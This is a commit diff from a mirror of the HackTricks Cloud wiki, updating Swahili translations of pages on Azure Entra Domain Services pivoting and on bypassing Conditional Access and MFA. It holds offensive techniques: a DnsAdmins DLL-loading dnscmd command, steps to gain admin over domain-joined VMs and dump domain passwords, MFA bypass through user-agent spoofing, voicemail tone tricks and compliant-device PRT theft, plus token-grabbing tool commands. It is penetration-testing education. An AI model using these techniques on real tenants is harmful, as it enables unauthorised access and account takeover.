gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2026-03-12 21:22:57 -07:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-lateral-movement-clo

Browse Source
This commit is contained in:
Translator
2026-02-12 13:43:24 +00:00
parent 292716a928
commit 1412bfa7c3
5 changed files with 155 additions and 85 deletions
Download Patch File Download Diff File Expand all files Collapse all files

12
.github/pull_request_template.md vendored
View File

@@ -1,9 +1,11 @@
## Attribution
Tunathamini maarifa yako na kukuhimiza kushiriki maudhui. Tafadhali hakikisha unachapisha tu maudhui ambayo unamiliki au ambayo una ruhusa ya kuyashiriki kutoka kwa mwandishi wa asili (kuongeza rejea kwa mwandishi katika maandiko yaliyoongezwa au mwishoni mwa ukurasa unaobadilisha au vyote viwili). Heshima yako kwa haki za mali ya akili inakuza mazingira ya kushiriki ambayo ni ya kuaminika na kisheria kwa kila mtu.
Unaweza kuondoa yaliyomo haya kabla ya kutuma PR:
## Marejeleo
Tunathamini ujuzi wako na tunaku himiza kushiriki maudhui. Tafadhali hakikisha kwamba unapakia tu maudhui unayomiliki au ambayo umepewa ruhusa kuyashirikisha kutoka kwa mwandishi wa asili (ongeza rejea kwa mwandishi katika maandishi uliyoongeza au mwishoni mwa ukurasa unaofanyia mabadiliko, au zote mbili). Heshima yako kwa haki za mali ya kiakili inakuza mazingira ya kushirikiana yenye uaminifu na halali kwa wote.
## HackTricks Training
Ikiwa unongeza ili uweze kupita mtihani wa [ARTE certification](https://training.hacktricks.xyz/courses/arte) kwa bendera 2 badala ya 3, unahitaji kuita PR `arte-<username>`.
Ikiwa unatumia PR ili upite katika mtihani wa [ARTE certification](https://hacktricks-training.com/courses/arte) na 2 flags badala ya 3, unahitaji kuitwa PR `arte-<username>`, `grte-<username>` au `azrte-<username>`, kulingana na cheti unachofanya.
Pia, kumbuka kwamba marekebisho ya sarufi/sintaksis hayatakubaliwa kwa kupunguza bendera za mtihani.
Pia, kumbuka kwamba marekebisho ya sarufi au sintaksia hayatakubaliwa kwa ajili ya kupunguzwa kwa flags kwenye mtihani.
Katika hali yoyote, asante kwa kuchangia katika HackTricks!
Kwa kila hali, asante kwa kuchangia HackTricks!

14
src/banners/hacktricks-training.md
View File

@@ -1,14 +1,14 @@
> [!TIP]
> Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Jifunze na fanya mazoezi ya Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Jifunze na ufanye mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://hacktricks-training.com/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na ufanye mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://hacktricks-training.com/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na ufanye mazoezi ya Az Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://hacktricks-training.com/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
> <summary>Saidia HackTricks</summary>
>
> - Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
> - Angalia the [**subscription plans**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) au the [**telegram group**](https://t.me/peass) au **utufuate** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki hacking tricks kwa kutuma PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
>
> </details>

34
src/pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-domain-services.md
View File

@@ -2,44 +2,44 @@
{{#include ../../../banners/hacktricks-training.md}}
## Huduma za Kikoa
## Domain Services
Microsoft Entra Domain Services inaruhusu kuanzisha Active Directory katika Azure bila kuhitaji kusimamia Domain Controllers (kwa kweli huna hata ufikiaji kwao).
Microsoft Entra Domain Services inaruhusu kupeleka Active Directory ndani ya Azure bila kuhitaji kusimamia Domain Controllers (kwa kweli hata huna ufikiaji kwao).
Lengo lake kuu ni kukuruhusu kuendesha programu za zamani katika wingu ambazo hazina uwezo wa kutumia mbinu za uthibitishaji wa kisasa, au ambapo hutaki utafutaji wa directory urudi kila wakati kwenye mazingira ya AD DS ya ndani.
Lengo lake kuu ni kukuwezesha kuendesha applications za legacy katika cloud ambazo haziwezi kutumia mbinu za kisasa za uthibitisho, au pale ambapo hutaki directory lookups zirudi kila mara kwenye mazingira ya onpremises AD DS.
Kumbuka kwamba ili kusawazisha watumiaji walioanzishwa katika Entra ID (na sio kusawazishwa kutoka kwa active directories nyingine) kwa huduma ya kikoa ya AD unahitaji **kubadilisha nenosiri la mtumiaji** kuwa jipya ili liweze kusawazishwa na AD mpya. Kwa kweli, mtumiaji hajasawazishwa kutoka Microsoft Entra ID hadi Huduma za Kikoa hadi nenosiri libadilishwe.
Kumbuka kwamba ili kusanidi watumiaji waliotengenezwa katika Entra ID (na ambao hawajasimamiwa kutoka kwa active directories nyingine) kwenda AD domain service unahitaji **kubadilisha password ya mtumiaji** kuwa mpya ili iweze kusanidiwa na AD mpya. Kwa kweli, mtumiaji haisaniswi kutoka Microsoft Entra ID kwenda Domain Services hadi password itakapobadilishwa.
> [!WARNING]
> Hata kama unaunda kikoa kipya cha active directory huwezi kukisimamia kabisa (isipokuwa kwa kutumia baadhi ya makosa ya usanidi), ambayo inamaanisha kwamba kwa kawaida huwezi kuunda watumiaji katika AD moja kwa moja. Unawaunda kwa **kusawazisha watumiaji kutoka Entra ID.** Unaweza kuashiria kusawazisha watumiaji wote (hata wale walio sambazwa kutoka AD za ndani), watumiaji wa wingu pekee (watumiaji walioanzishwa katika Entra ID), au hata **kuwafanyia uchujaji zaidi**.
> Hata kama unaunda domain mpya ya active directory hautaweza kuuisimamia kikamilifu (isipokuwa bila kutumia baadhi ya misconfigurations), ambayo inamaanisha kwamba kwa default kwa mfano huwezi kuunda watumiaji moja kwa moja katika AD. Unawaunda kwa **kusanidiwatumiaji kutoka Entra ID.** Unaweza kubainisha kusanidi watumiaji wote (hata wale wamesanidiwa kutoka kwa onpremise ADs nyingine), watumiaji wa cloud pekee (watumiaji waliotengenezwa katika Entra ID), au hata **kuwapimia zaidi**.
> [!NOTE]
> Kwa ujumla, kutokana na ukosefu wa kubadilika katika usanidi wa kikoa kipya na ukweli kwamba AD mara nyingi tayari ziko ndani, hii siyo muunganiko mkuu kati ya Entra ID na AD, lakini bado ni ya kuvutia kujua jinsi ya kuathiri.
> Kwa ujumla, kutokana na ukosefu wa ufanisi katika usanidi wa domain mpya na ukweli kwamba ADs kwa kawaida tayari ziko onpremise, hii sio integrasheni kuu kati ya Entra ID na AD, lakini bado ni ya kuvutia kujua jinsi ya kuikomboa.
### Pivoting
Wajumbe wa kundi lililoundwa la **`AAD DC Administrators`** wanapewa ruhusa za usimamizi wa ndani kwenye VMs ambazo zimeunganishwa na kikoa kinachosimamiwa (lakini sio kwenye domain controllers) kwa sababu wameongezwa kwenye kundi la wasimamizi wa ndani. Wajumbe wa kundi hili pia wanaweza kutumia **Remote Desktop kuungana kwa mbali na VMs zilizounganishwa na kikoa**, na pia ni wajumbe wa makundi:
Members of the generated `AAD DC Administrators` group wanapewa ruhusa za local admin kwenye VMs ambazo zimejiunga na domain iliyosimamiwa (lakini si kwenye domain controllers) kwa sababu wanaongezwa kwenye local administrators group. Members of this group pia wanaweza kutumia **Remote Desktop to connect remotely to domain-joined VMs**, na pia ni members wa makundi yafuatayo:
- **`Denied RODC Password Replication Group`**: Hili ni kundi linalobainisha watumiaji na makundi ambayo nenosiri zao haziwezi kuhifadhiwa kwenye RODCs (Read-Only Domain Controllers).
- **`Group Policy Creators Owners`**: Kundi hili linawaruhusu wajumbe kuunda Sera za Kundi katika kikoa. Hata hivyo, wajumbe wake hawawezi kutekeleza sera za kundi kwa watumiaji au kundi au kuhariri GPO zilizopo, hivyo si ya kuvutia sana katika mazingira haya.
- **`DnsAdmins`**: Kundi hili linaruhusu kusimamia mipangilio ya DNS na limekuwa likitumiwa vibaya katika siku za nyuma ili [kuinua mamlaka na kuathiri kikoa](https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html?highlight=dnsadmin#dnsadmins), hata hivyo baada ya kujaribu shambulio katika mazingira haya ilithibitishwa kwamba udhaifu umepatiwa suluhisho:
- **`Denied RODC Password Replication Group`**: Hii ni group inayobainisha watumiaji na makundi ambao nywila zao haziwezi kuhifadhiwa kwenye RODCs (Read-Only Domain Controllers).
- **`Group Policy Creators Owners`**: Group hii inaruhusu members kuunda Group Policies katika domain. Hata hivyo, members wake hawawezi kuapisha group policies kwa watumiaji au makundi au kuhariri GPOs zilizopo, hivyo si ya kuvutia sana katika mazingira haya.
- **`DnsAdmins`**: Group hii inaruhusu kusimamia settings za DNS na ilitumiwa vibaya zamani ili [escalate privileges and compromise the domain](https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges.html?highlight=dnsadmin#dnsadmins), hata hivyo baada ya kujaribu attack katika mazingira haya ilibainika kuwa udhaifu umepatiwa patch:
```text
dnscmd TDW52Y80ZE26M1K.azure.training.hacktricks.xyz /config /serverlevelplugindll \\10.1.0.6\c$\Windows\Temp\adduser.dll
dnscmd TDW52Y80ZE26M1K.azure.hacktricks-training.com /config /serverlevelplugindll \\10.1.0.6\c$\Windows\Temp\adduser.dll
DNS Server failed to reset registry property.
Status = 5 (0x00000005)
Command failed: ERROR_ACCESS_DENIED 5 0x5
```
Kumbuka kwamba ili kutoa ruhusa hizi, ndani ya AD kundi **`AAD DC Administrators`** linafanywa kuwa mwanachama wa makundi ya awali, na pia GPO **`AADDC Computers GPO`** inaongeza kama Wasimamizi wa Mitaa wanachama wote wa kundi la kikoa **`AAD DC Administrators`**.
Note that to grant these permissions, inside the AD the group **`AAD DC Administrators`** group is made a member of the previous groups, and also the GPO **`AADDC Computers GPO`** is adding as Local Administrators all the members of the domain group **`AAD DC Administrators`**.
Kupitia Entra ID hadi AD iliyoundwa na Huduma za Kikoa ni rahisi, ongeza tu mtumiaji kwenye kundi **`AAD DC Administrators`**, upate kupitia RDP kwenye mashine yoyote/zote katika kikoa na utaweza kuiba data na pia **kuathiri kikoa.**
Kupitia kutoka Entra ID kwenda AD iliyoundwa na Domain Services ni rahisi — ingiza tu mtumiaji kwenye kikundi **`AAD DC Administrators`**, ingia kwa RDP kwenye mashine yoyote/nyote kwenye domain na utaweza kuiba data na pia **compromise the domain.**
Hata hivyo, kupita kutoka kikoa hadi Entra ID si rahisi kwani hakuna chochote kutoka kikoa kinachosawazishwa kwenye Entra ID. Hata hivyo, kila wakati angalia metadata kwa VMs zote zilizounganishwa kwani utambulisho wao wa usimamizi uliotolewa unaweza kuwa na ruhusa za kuvutia. Pia **dondoa nywila za watumiaji wote kutoka kikoa** na jaribu kuzivunja ili kisha uingie kwenye Entra ID / Azure.
Hata hivyo, kupita kutoka domain kwenda Entra ID si rahisi kwa sababu hakuna chochote kutoka domain kinachosynchronisewa ndani ya Entra ID. Kila mara angalia metadata ya VMs zote zilizounganishwa, kwani managed identities zao zilizotengwa zinaweza kuwa na ruhusa za kuvutia. Pia **dump all the users passwords from the domain** na jaribu ku-crack ili kisha ku-login kwenye Entra ID / Azure.
> [!NOTE]
> Kumbuka kwamba katika siku za nyuma, udhaifu mwingine katika AD hii iliyosimamiwa ulipatikana ambao uliruhusu kuathiri DCs, [kama hii](https://www.secureworks.com/research/azure-active-directory-domain-services-escalation-of-privilege?utm_source=chatgpt.com). Mshambuliaji anayekabili DC anaweza kwa urahisi kudumisha uwepo bila wasimamizi wa Azure kugundua au hata kuwa na uwezo wa kuondoa.
> Kumbuka kwamba hapo zamani zilitambuliwa nyufa nyingine katika managed AD hii ambazo ziliruhusu compromise ya DCs, [like this one](https://www.secureworks.com/research/azure-active-directory-domain-services-escalation-of-privilege?utm_source=chatgpt.com). Mshambulizi akibora DC angeweza kwa urahisi kudumisha persistence bila Azure admins wakiyagundua au hata kuwa na uwezo wa kuiondoa.
### Enumeration
### Uorodheshaji
```bash
# Get configured domain services domains (you can add more subs to check in more subscriptions)
az rest --method post \
@@ -59,7 +59,7 @@ az rest --method post \
# Get domain configuration
az rest --url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/entra-domain-services/providers/Microsoft.AAD/DomainServices/<domain-name>?api-version=2022-12-01&healthdata=true"
## e.g.
az rest --url "https://management.azure.com/subscriptions/0ce1297c-9153-425d-3229-f51093614377/resourceGroups/entra-domain-services/providers/Microsoft.AAD/DomainServices/azure.training.hacktricks.xyz?api-version=2022-12-01&healthdata=true"
az rest --url "https://management.azure.com/subscriptions/0ce1297c-9153-425d-3229-f51093614377/resourceGroups/entra-domain-services/providers/Microsoft.AAD/DomainServices/azure.hacktricks-training.com?api-version=2022-12-01&healthdata=true"
# Based on the VNet assigned to the domain services, you can enumerate the VMs in the domain

112
src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/az-conditional-access-policies-mfa-bypass.md
View File

@@ -1,18 +1,18 @@
# Az - Sera za Ufikiaji wa Masharti & Bypass ya MFA
# Az - Conditional Access Policies & MFA Bypass
{{#include ../../../../banners/hacktricks-training.md}}
## Taarifa za Msingi
Sera za Ufikiaji wa Masharti za Azure ni sheria zilizowekwa katika Microsoft Azure ili kutekeleza udhibiti wa ufikiaji kwa huduma na programu za Azure kulingana na **masharti** fulani. Sera hizi zinasaidia mashirika kulinda rasilimali zao kwa kutumia udhibiti sahihi wa ufikiaji chini ya hali sahihi.\
Sera za ufikiaji wa masharti kimsingi **zinafafanua** **Nani** anaweza kufikia **Nini** kutoka **Wapi** na **Jinsi**.
Azure Conditional Access policies ni kanuni zilizowekwa katika Microsoft Azure kutekeleza udhibiti wa upatikanaji kwa Azure services na programu kulingana na certain **masharti**. Sera hizi husaidia mashirika kulinda rasilimali zao kwa kutumia udhibiti sahihi wa upatikanaji katika mazingira sahihi.\
Conditional access policies kwa msingi hufafanua **Nani** anaweza kufikia **Nini** kutoka **Wapi** na **Jinsi**.
Hapa kuna mifano kadhaa:
Hapa kuna mifano michache:
1. **Sera ya Hatari ya Kuingia**: Sera hii inaweza kuwekwa ili kuhitaji uthibitisho wa hatua nyingi (MFA) wakati hatari ya kuingia inagundulika. Kwa mfano, ikiwa tabia ya kuingia ya mtumiaji ni ya ajabu ikilinganishwa na muundo wao wa kawaida, kama kuingia kutoka nchi tofauti, mfumo unaweza kuomba uthibitisho wa ziada.
2. **Sera ya Uzingatiaji wa Kifaa**: Sera hii inaweza kuzuia ufikiaji wa huduma za Azure tu kwa vifaa ambavyo vinakidhi viwango vya usalama vya shirika. Kwa mfano, ufikiaji unaweza kuruhusiwa tu kutoka kwa vifaa ambavyo vina programu ya antivirus iliyo na sasisho au vinatumia toleo fulani la mfumo wa uendeshaji.
1. **Sign-In Risk Policy**: Sera hii inaweza kuwekwa kuhitaji multi-factor authentication (MFA) wakati hatari ya kuingia inapotambuliwa. Kwa mfano, ikiwa tabia ya kuingia ya mtumiaji ni isiyo ya kawaida ukilinganisha na muundo wao wa kawaida, kama kuingia kutoka nchi tofauti, mfumo unaweza kuomba uthibitisho wa ziada.
2. **Device Compliance Policy**: Sera hii inaweza kuzuiwa upatikanaji kwa Azure services tu kwa vifaa vinavyokubaliana na viwango vya usalama vya shirika. Kwa mfano, upatikanaji unaweza kuruhusiwa tu kutoka kwa vifaa ambavyo vina antivirus iliyosasishwa au vinatumia toleo fulani la mfumo wa uendeshaji.
## Uhesabuji
## Enumeration
```bash
# Get all the policies from Azure without needing any special permission with (idea from https://github.com/LuemmelSec/APEX/blob/main/APEX.ps1)
az rest --method GET --uri 'https://graph.windows.net/<tenant-id>/policies?api-version=1.61-internal' | jq '.value[] | select(.policyType == 18) | {displayName, policyDetail: (.policyDetail[] | fromjson)}'
@@ -20,79 +20,79 @@ az rest --method GET --uri 'https://graph.windows.net/<tenant-id>/policies?api-v
# You need Policy.Read.ConditionalAccess or Policy.Read.All permission in Entra ID
az rest --method get --uri "https://graph.microsoft.com/beta/identity/conditionalAccess/policies"
```
## Sera za Upatikanaji wa Masharti
## Njia za Kuvuka Sera za Conditional Access
Inawezekana kwamba sera ya upatikanaji wa masharti **inaangalia taarifa ambazo zinaweza kubadilishwa kwa urahisi kuruhusu kupita sera hiyo**. Na ikiwa kwa mfano sera hiyo ilikuwa inakamilisha MFA, mshambuliaji ataweza kuipita.
Inawezekana kwamba sera ya conditional access inakuwa **ikikagua baadhi ya taarifa ambazo zinaweza kubadilishwa kwa urahisi na kuruhusu kuvuka sera**. Na kwa mfano, ikiwa sera ilikuwa ikisanidi MFA, mshambuliaji ataweza kuipita.
Wakati wa kuunda sera ya upatikanaji wa masharti, ni muhimu kuashiria **watumiaji** walioathirika na **rasilimali za lengo** (kama programu zote za wingu).
Unaposanidi sera ya conditional access inahitajika kubainisha **watumiaji** walioathirika na **rasilimali lengwa** (kama programu zote za cloud).
Pia inahitajika kuunda **masharti** ambayo yatakuwa **yanasababisha** sera hiyo:
Pia inahitajika kusanidi **masharti** ambayo yata**chochea** sera:
- **Mtandao**: Ip, anuwai za IP na maeneo ya kijiografia
- Inaweza kupitishwa kwa kutumia VPN au Proxy kuungana na nchi au kufanikiwa kuingia kutoka anwani ya IP iliyoidhinishwa
- **Hatari za Microsoft**: Hatari ya mtumiaji, Hatari ya kuingia, Hatari ya ndani
- **Majukwaa ya vifaa**: Kila kifaa au kuchagua Android, iOS, Windows phone, Windows, macOS, Linux
- Ikiwa “Kila kifaa” hakijachaguliwa lakini chaguo zingine zote zimechaguliwa, inawezekana kupita kwa kutumia user-agent wa nasibu usiohusiana na majukwaa hayo
- **Programu za mteja**: Chaguo ni “Kivinjari”,Programu za simu na wateja wa desktop”, “Wateja wa Exchange ActiveSync” na “Wateja wengine
- Ili kupita kuingia na chaguo kisichochaguliwa
- **Filita kwa vifaa**: Inawezekana kuunda sheria inayohusiana na kifaa kilichotumika
- **Mchakato wa uthibitishaji**: Chaguo ni “Mchakato wa nambari ya kifaa” na “Uhamisho wa uthibitishaji
- Hii haitamathirisha mshambuliaji isipokuwa anajaribu kutumia mojawapo ya protokali hizo katika jaribio la uvuvi kuingia kwenye akaunti ya mwathirika
- **Network**: IP, IP ranges na maeneo kijiografia
- Inaweza kuvukwa kwa kutumia VPN au Proxy kuunganishwa na nchi iliyoruhusiwa au kwa kufanikiwa kuingia kutoka anwani ya IP iliyoruhusiwa
- **Microsoft risks**: User risk, Sign-in risk, Insider risk
- **Device platforms**: Any device au chagua Android, iOS, Windows phone, Windows, macOS, Linux
- Ikiwa “Any device” haishachaguliwa lakini chaguo zote nyingine zimetengwa, inawezekana kuzipita kwa kutumia user-agent isiyohusiana na yale majukwaa
- **Client apps**: Options areBrowser”, “Mobiles apps and desktop clients”, “Exchange ActiveSync clients” and Other clients
- Kuipita kwa kuingia kwa chaguo ambacho hakijachaguliwa
- **Filter for devices**: Inawezekana kutengeneza rule inayohusiana na kifaa kinachotumika
- **Authentication flows**: Options are “Device code flow” and “Authentication transfer
- Hii haitamkera mshambuliaji isipokuwa anajaribu kuabusu moja ya protokoli hizo katika jaribio la phishing ili kupata akaunti ya mwathirika
Matokeo yanayowezekana ni: Zuia au Ruhusu upatikanaji na masharti yanayoweza kama kuhitaji MFA, kifaa kuwa na ufanisi...
Matokeo yanayowezekana ni: Kuzuia au Kutoa ufikiaji kwa masharti kama kuhitaji MFA, kifaa kiwe compliant…
### Majukwaa ya Vifaa - Masharti ya Kifaa
### Device Platforms - Device Condition
Inawezekana kuweka masharti kulingana na **jukwaa la kifaa** (Android, iOS, Windows, macOS...), hata hivyo, hii inategemea **user-agent** hivyo ni rahisi kupita. Hata **kufanya chaguo zote zitekeleze MFA**, ikiwa utatumia **user-agent ambayo haitambuliwi,** utaweza kupita MFA au kuzuia:
Inawezekana kuweka masharti kulingana na **device platform** (Android, iOS, Windows, macOS...), hata hivyo, hii inategemea **user-agent** hivyo ni rahisi kuipita. Hata **kufanya chaguo zote zifanye MFA iwe lazima**, ikiwa utatumia **user-agent ambayo haijatambuliwa,** utaweza kuipita MFA au kuzuia:
<figure><img src="../../../../images/image (352).png" alt=""><figcaption></figcaption></figure>
Kufanya kivinjari **kitume user-agent isiyojulikana** (kama `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) inatosha kutosababisha masharti haya.\
Unaweza kubadilisha user agent **kwa mikono** katika zana za maendeleo:
Kwa kufanya tu browser **itume user-agent isiyojulikana** (kama `Mozilla/5.0 (compatible; MSIE 10.0; Windows Phone 8.0; Trident/6.0; IEMobile/10.0; ARM; Touch; NOKIA; Lumia 920) UCBrowser/10.1.0.563 Mobile`) inatosha kutoanzisha masharti haya.\
Unaweza kubadilisha user agent kwa **mikono** katika developer tools:
<figure><img src="../../../../images/image (351).png" alt="" width="375"><figcaption></figcaption></figure>
Au tumia [nyongeza ya kivinjari kama hii](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en).
Au tumia [browser extension kama hii](https://chromewebstore.google.com/detail/user-agent-switcher-and-m/bhchdcejhohfmigjafbampogmaanbfkg?hl=en).
### Mikoa: Nchi, anuwai za IP - Masharti ya Kifaa
### Locations: Countries, IP ranges - Device Condition
Ikiwa hii imewekwa katika sera ya masharti, mshambuliaji anaweza tu kutumia **VPN** katika **nchi iliyoidhinishwa** au kujaribu kupata njia ya kuingia kutoka **anwani ya IP iliyoidhinishwa** ili kupita masharti haya.
Ikiwa hili limewekwa kwenye sera ya conditional, mshambuliaji anaweza kutumia VPN katika nchi iliyoruhusiwa au kujaribu kupata njia ya kuingia kutoka anwani ya IP iliyoruhusiwa kuvuka masharti haya.
### Programu za Wingu
### Cloud Apps
Inawezekana kuunda **sera za upatikanaji wa masharti kuzuia au kulazimisha** kwa mfano MFA wakati mtumiaji anajaribu kufikia **programu maalum**:
Inawezekana kusanidi **conditional access policies ili kuzuia au kulazimisha** kwa mfano MFA wakati mtumiaji anajaribu kufikia **app maalum**:
<figure><img src="../../../../images/image (353).png" alt=""><figcaption></figcaption></figure>
Ili kujaribu kupita ulinzi huu unapaswa kuona ikiwa unaweza **kuingia tu katika programu yoyote**.\
Zana [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) ina **mifumo ya utambulisho wa programu kumi** na itajaribu kuingia ndani yao na kukujulisha na hata kukupa token ikiwa ni mafanikio.
Ili kujaribu kuipita ulinzi huu unapaswa kuona kama unaweza **ingia kwenye programu yoyote**.\
Tool [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep) ina **kumi na kumi za application IDs zilizowekwa (hardcoded)** na itajaribu kuingia nazo na kukuarifu na hata kukupatia token ikiwa itafanikiwa.
Ili **kujaribu mifumo maalum ya utambulisho katika rasilimali maalum** unaweza pia kutumia zana kama:
Ili **kuuza specific application IDs katika rasilimali maalum** pia unaweza kutumia tool kama:
```bash
roadrecon auth -u user@email.com -r https://outlook.office.com/ -c 1fec8e78-bce4-4aaf-ab1b-5451cc387264 --tokens-stdout
<token>
```
Zaidi ya hayo, inawezekana pia kulinda njia ya kuingia (kwa mfano, ikiwa unajaribu kuingia kutoka kwa kivinjari au kutoka kwa programu ya desktop). Chombo [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) hufanya baadhi ya ukaguzi ili kujaribu kupita ulinzi huu pia.
Zaidi ya hayo, pia inawezekana kulinda njia ya kuingia (kwa mfano ikiwa unajaribu kuingia kutoka kwa browser au kutoka kwa desktop application). Zana [**Invoke-MFASweep**](az-conditional-access-policies-mfa-bypass.md#invoke-mfasweep) hufanya ukaguzi kadhaa ili kujaribu kupita (bypass) ulinzi huu pia.
Chombo [**donkeytoken**](az-conditional-access-policies-mfa-bypass.md#donkeytoken) kinaweza pia kutumika kwa madhumuni sawa ingawa kinaonekana hakijatunzwa.
Zana [**donkeytoken**](az-conditional-access-policies-mfa-bypass.md#donkeytoken) pia inaweza kutumika kwa madhumuni sawa ingawa inaonekana haendelezwi.
Chombo [**ROPCI**](https://github.com/wunderwuzzi23/ropci) kinaweza pia kutumika kujaribu ulinzi huu na kuona ikiwa inawezekana kupita MFAs au vizuizi, lakini chombo hiki kinatumika kutoka kwa mtazamo wa **whitebox**. Kwanza unahitaji kupakua orodha ya Programu zinazoruhusiwa katika mpangilio na kisha itajaribu kuingia ndani yao.
Zana [**ROPCI**](https://github.com/wunderwuzzi23/ropci) pia inaweza kutumika kujaribu ulinzi huu na kuona kama inawezekana kupita MFA au vizuizi, lakini zana hii inafanya kazi kutoka mtazamo wa **whitebox**. Kwanza unahitaji kupakua orodha ya Apps zilizoruhusiwa katika tenant kisha itajaribu kuingia ndani yao.
## Mipango Mingine ya Az MFA
## Njia Nyingine za Kupita za Az MFA
### Sauti ya Kengele
### Toni ya simu
Chaguo moja la Azure MFA ni **kupokea simu kwenye nambari ya simu iliyowekwa** ambapo mtumiaji ataulizwa **kutuma herufi `#`**.
Moja ya chaguo za Azure MFA ni **kupokea simu kwenye namba ya simu iliyosanidiwa** ambapo mtumiaji ataombwa **kutuma alama `#`**.
> [!CAUTION]
> Kwa kuwa herufi ni tu **sauti**, mshambuliaji anaweza **kuathiri** ujumbe wa **voicemail** wa nambari ya simu, kuweka kama ujumbe **sauti ya `#`** na kisha, wakati wa kuomba MFA hakikisha kwamba **simu ya waathiriwa inashughulika** (ikiitafuta) ili simu ya Azure irejeleze kwenye voicemail.
> Kwa kuwa alama ni tu **tones**, mshambuliaji anaweza **kuingilia** ujumbe wa sauti (voicemail) wa namba ya simu, kusanidi ujumbe kuwa **tone ya `#`** na kisha, anapokuomba MFA hakikisha simu ya mwathirika iko **busy** (ikiwa inapigiwa) ili simu ya Azure ipelekwe kwenye ujumbe wa sauti.
### Vifaa Vinavyokubalika
### Vifaa vinavyokubalika
Sera mara nyingi zinahitaji kifaa kinachokubalika au MFA, hivyo **mshambuliaji anaweza kujiandikisha kifaa kinachokubalika**, kupata tokeni ya **PRT** na **kupita njia hii MFA**.
Sera mara nyingi zinaomba kifaa kinachokubalika au MFA, hivyo mshambuliaji anaweza kusajili kifaa kinachokubalika, kupata token ya **PRT** na kwa njia hiyo **kupita (bypass) MFA**.
Anza kwa kujiandikisha **kifaa kinachokubalika katika Intune**, kisha **pata PRT** kwa:
Anza kwa kusajili **kifaa kinachokubalika katika Intune**, kisha **pata PRT** na:
```bash
$prtKeys = Get-AADIntuneUserPRTKeys - PfxFileName .\<uuid>.pfx -Credentials $credentials
@@ -102,19 +102,19 @@ Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken
<token returned>
```
Find more information about this kind of attack in the following page:
Pata taarifa zaidi kuhusu aina hii ya shambulio kwenye ukurasa ufuatao:
{{#ref}}
../../az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md
{{#endref}}
## Tooling
## Zana
### [**AzureAppsSweep**](https://github.com/carlospolop/AzureAppsSweep)
Hii script inapata baadhi ya akidi za mtumiaji na kuangalia kama inaweza kuingia katika baadhi ya programu.
Script hii hupata baadhi ya credentials za watumiaji na kuangalia kama inaweza kuingia kwenye baadhi ya applications.
Hii ni muhimu kuona kama **huhitajiki MFA kuingia katika baadhi ya programu** ambazo unaweza baadaye kutumia vibaya ili **kuinua haki**.
Hii ni muhimu kuona ikiwa **MFA hainahitajiki kuingia kwenye baadhi ya applications** ambazo unaweza baadaye kuzitumia vibaya ili **escalate privileges**.
### [roadrecon](https://github.com/dirkjanm/ROADtools)
@@ -124,17 +124,17 @@ roadrecon plugin policies
```
### [Invoke-MFASweep](https://github.com/dafthack/MFASweep)
